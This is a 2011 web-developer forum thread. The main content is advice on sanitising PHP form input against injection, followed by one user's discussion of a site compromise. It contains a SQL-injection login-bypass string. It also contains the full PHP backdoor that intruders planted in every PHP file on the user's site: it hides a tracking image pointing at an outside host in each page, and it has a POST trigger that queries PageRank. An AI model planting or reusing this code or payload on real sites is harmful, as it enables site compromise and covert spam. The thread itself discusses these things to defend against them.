|
Phaėton
|
 |
« on: June 12, 2011, 11:11:49 AM » |
|
Them: What have you done thus far?  (notice the arrogant extra question marks) Me(under breath) Well mostly just report to bi-hourly status updates to a force of distraction from you clods, much worse than a newborn puppy. Me(above breath): I have a bug im trying to track down. Them: Can you post to the site what you have done so i can see your progress? (me:) |
|
|
|
Logged
|
When I was your age we used to walk to the TV to change the channel.... _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
|
|
|
|
|
|
perkiset
|
|
« Reply #2 on: June 12, 2011, 11:57:02 AM » |
|
(me, looking at Phaeton code): unless that's proto code you might want to do a little more cleansing because there look to be several vectors left open in there ...
|
|
|
|
|
Logged
|
It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
|
|
|
|
Phaėton
|
|
« Reply #3 on: June 12, 2011, 12:21:01 PM » |
|
do tell perkiset?
btw i fixed that error for them and now im dealing with this one:
weve got fatal errors on line 10692 and more time to not answer questions.. (lol)
but i just did a bunch of code pasted together in random order... where you talking
about the passwordsubmitted / ghetto login stuff cause that actually is something
else im dicking with .... do tell... vectors?
|
|
|
|
Logged
|
When I was your age we used to walk to the TV to change the channel.... _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
|
|
|
|
perkiset
|
|
« Reply #4 on: June 12, 2011, 03:12:02 PM » |
|
submit a password of
' or 1 or '
(with apostrophes)
many ways to maneuver that one, make sure that there's no way people can send you controlling characters.
try
$_POST['thePassword'] = preg_replace('/[^A-Z0-9\-_\.]/i', '', $_POST['thePassword']);
that's a quick and dirty squasher that will make sure that nothing except characters you expect come though fields like that.
For numerics, my personal favorite is
$_POST['numVal'] = $_POST['numVal'] - 0;
|
|
|
|
|
Logged
|
It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
|
|
|
|
Phaėton
|
|
« Reply #5 on: June 12, 2011, 04:35:39 PM » |
|
submit a password of
' or 1 or '
(with apostrophes)
many ways to maneuver that one, make sure that there's no way people can send you controlling characters.
try
$_POST['thePassword'] = preg_replace('/[^A-Z0-9\-_\.]/i', '', $_POST['thePassword']);
that's a quick and dirty squasher that will make sure that nothing except characters you expect come though fields like that.
For numerics, my personal favorite is
$_POST['numVal'] = $_POST['numVal'] - 0;
im guessing you pass the whole $_POST off for cleaning to a routine! I like the 'numval-0' very nice! so lets say i just leave it without stripping all but allowable characters.. what could someone do by sending me control characters? send like a '; eval('file_get_contents('worlddom.php'); as a post var? or something like that? |
|
|
|
|
Logged
|
When I was your age we used to walk to the TV to change the channel.... _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
|
|
|
|
perkiset
|
|
« Reply #6 on: June 12, 2011, 11:42:18 PM » |
|
That would represent a larger hole andIve not toyed with that. I was targeting DBinjections actually. Yes, I often setup a cleansing routine if I have a lot of input I need from the user. I'll often cleanse it first in JS first, then look for dodgy chars. If they are there, then I am 100% certain that the post was programmatically sent and most likely, by one of my, ahem, buddies here  I'd rather put the normal work of char cleansing out at the client so I don't even need to burden my servers with it. But I double up when it's arrived anyway. BTW real geeks would've said $_POST['numVal'] -= 0; because it compiles tighter. I remember that syntax when working real arithmetic, but just always seem to forget it in simple cleansers. |
|
|
|
|
Logged
|
It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
|
|
|
|
Phaėton
|
|
« Reply #7 on: June 29, 2011, 12:59:25 PM » |
|
oh so thats what prollhy happened here where someone put this crap in every php file even my backups: <?php
//{{126104ed
GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function outputxxx_callback($str)
{
$links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>';
preg_match("|</body>|si",$str,$arr);
return str_replace($arr[0],$links.$arr[0],$str);
}
function StrToNum($Str, $Check, $Magic)
{
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String)
{
$Check1 = StrToNum($String, 0x1505, 0x21);
$Check2 = StrToNum($String, 0, 0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
return ($T1 | $T2);
}
function CheckHash($Hashnum)
{
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
for ($i = $length-1; $i >= 0; $i--) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
function getpr($url)
{
$ch = CheckHash(HashURL($url));
$file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
$data = file_get_contents($file);
$pos = strpos($data, "Rank_");
if($pos === false){return -1;} else{
$pr=substr($data, $pos + 9);
$pr=trim($pr);
$pr=str_replace("
",'',$pr);
return $pr;
}
}
if(isset($_POST['xxxprch']))
{
echo getpr($_POST['xxxprch']);
exit();
}
else
ob_start('outputxxx_callback');
error_reporting($olderrxxx);
}
//}}861921ab
|
|
|
|
|
Logged
|
When I was your age we used to walk to the TV to change the channel.... _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
|
|
|
|
nutballs
|
|
« Reply #8 on: June 29, 2011, 03:53:23 PM » |
|
Err wtf is >>=
I must really be stuck in verbosity land.
|
|
|
|
|
Logged
|
I could eat a bowl of Alphabet Soup and shit a better argument than that.
|
|
|
|
perkiset
|
|
« Reply #9 on: June 29, 2011, 11:23:00 PM » |
|
bitwise shift right + the php assign to operator.
Much like +=, but >>= shift equals
|
|
|
|
|
Logged
|
It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
|
|
|
|
nutballs
|
|
« Reply #10 on: June 30, 2011, 07:32:36 AM » |
|
Oh yea. That ancient mystery of code.
|
|
|
|
|
Logged
|
I could eat a bowl of Alphabet Soup and shit a better argument than that.
|
|
|
|
